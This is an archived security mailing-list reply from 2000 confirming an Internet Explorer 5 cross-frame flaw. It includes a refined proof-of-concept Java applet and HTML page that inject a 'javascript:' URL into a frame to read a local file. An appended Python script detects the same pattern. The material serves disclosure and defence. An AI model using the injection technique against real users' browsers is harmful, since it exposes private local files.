Subject: Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)
From: TAKAGI, Hiromitsu (takagi@ETL.GO.JP)
Date: Thu Apr 20 2000 - 19:29:46 CDT
- Next message: rain forest puppy: "RFP2K03: Contemplations on dvwssr.dll and its affects on life"
- Previous message: B Potter: "Re: Network Security and Privacy"
- In reply to: Georgi Guninski: "IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)"
- Next in thread: Georgi Guninski: "Re: IE 5 security vulnerablity - circumventing Cross-framesecurity policy using Java/JavaScript (and disabling ActiveScripting is not that easy)"
- Reply: TAKAGI, Hiromitsu: "Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)"
- Reply: Georgi Guninski: "Re: IE 5 security vulnerablity - circumventing Cross-framesecurity policy using Java/JavaScript (and disabling ActiveScripting is not that easy)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Tue, 18 Apr 2000 16:20:48 +0300
Georgi Guninski <joro@NAT.BG> wrote:
> Georgi Guninski security advisory #10, 2000
> IE 5 security vulnerablity - circumventing Cross-frame security policy
> using Java/JavaScript (and disabling Active Scripting is not that easy)
> Usually, IE 5.x does not allow assigning "javascript:" urls to the
> location object because this is dangerous.
> But this may be circumvented with the help of the interaction between
> Java and the DOM/JavaScript.
I confirmed the vulnerability. But I have two comments on your
report.
> Note: This is NOT a bug in the Java language, this is a bug in
> Microsoft's implementation of Java in IE.
It is not a bug in the implementation of "Java". The class JSObject,
which is the magic code of the vulnerability, is not included in the
standard Java API; it is included in the package netscape.javascript,
which is an extension library provided by Netscape or Microsoft. So,
it sounds better to say, "This is NOT a bug of Java, this is a bug
in Microsoft's implementation of the extension Java package for
JavaScript".
> If you have Java enabled and Scripting of Java applets enabled, Active
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Scripting may be executed.
> So, to really disable Active Scripting disable Active Scripting and
> disable Java and/or Scripting of Java applets.
^^
> Workaround: Disable Java or disable Scripting of Java applets
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Disabling "Scripting of Java applets" seems to have no relation to the
vulnerability. Your exploit code can be refined as the following code,
which does not use the function "Scripting of Java applets". This
modified version of Guninski's demo is available here:
http://java-house.etl.go.jp/~takagi/java/test/Guninski-jsinject-modified/
I confirmed that it is still vulnerable with "Scripting of Java
applets" disabled.
------jsinject.java--------------------------------
import java.applet.Applet;
import netscape.javascript.*;

public class jsinject extends Applet {
    public void start() {
    //          ^^^^^^^
        try {
            // JSObject (netscape.javascript extension) bridges the applet to the page's DOM
            JSObject win = (JSObject)JSObject.getWindow(this);
            JSObject doc = (JSObject)win.getMember("document");
            // reach the IFRAME named I1 through the DOM
            JSObject I1 = (JSObject)doc.getMember("I1");
            JSObject loc = (JSObject)I1.getMember("location");
            // assign the "javascript:" URL from the applet parameter to the frame's location
            loc.setMember("href", getParameter("jscode"));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
---------------------------------------------------
------jsinject.html--------------------------------
<IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<applet MAYSCRIPT code="jsinject">
<param name="jscode" value="javascript:alert(document.body.innerText)">
</applet>
---------------------------------------------------
-- Hiromitsu Takagi Electrotechnical Laboratory http://www.etl.go.jp/~takagi/
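The following is an added example, not part of Takagi's or Guninski's posts: a small content-inspection check that flags the ingredients the demo page above combines (an IFRAME with a file: source, an applet declared MAYSCRIPT, and an applet parameter carrying a "javascript:" URL). The sample page it scans is constructed here to mirror jsinject.html plus one harmless applet; the class and function names are this example's own.

```python
import re
from html.parser import HTMLParser

# Constructed sample input (an assumption for this example): the jsinject.html
# demo from the thread, followed by an applet that should not be flagged.
SAMPLE_HTML = """
<IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<applet MAYSCRIPT code="jsinject">
<param name="jscode" value="javascript:alert(document.body.innerText)">
</applet>
<applet code="harmless">
<param name="colour" value="blue">
</applet>
"""


class AppletAuditor(HTMLParser):
    """Collects (finding-kind, detail) pairs for applets that may script the
    page and for frames that point at local files."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._applet = None  # attributes of the <applet> currently open, if any

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values keep their case.
        attrs = {name: (value or "") for name, value in attrs}
        if tag == "iframe" and attrs.get("src", "").lower().startswith("file:"):
            self.findings.append(("iframe-file-src", attrs["src"]))
        elif tag == "applet":
            self._applet = attrs
            # MAYSCRIPT is what lets the applet reach the DOM through JSObject
            if "mayscript" in attrs:
                self.findings.append(("applet-mayscript", attrs.get("code", "")))
        elif tag == "param" and self._applet is not None:
            # a javascript: URL handed to an applet is the payload shape of the demo
            if re.match(r"\s*javascript:", attrs.get("value", ""), re.IGNORECASE):
                self.findings.append(("param-javascript-url", attrs.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "applet":
            self._applet = None


def audit_html(html):
    """Return the list of findings for one HTML document, in document order."""
    auditor = AppletAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for kind, detail in audit_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run against the constructed sample it reports the file: IFRAME, the MAYSCRIPT applet "jsinject" and the "jscode" parameter, and nothing for the second applet. As Takagi's point implies, the presence of a javascript: parameter is only a heuristic: the applet could build the URL at runtime, so the check is a triage aid, not a substitute for disabling Java in the affected browser.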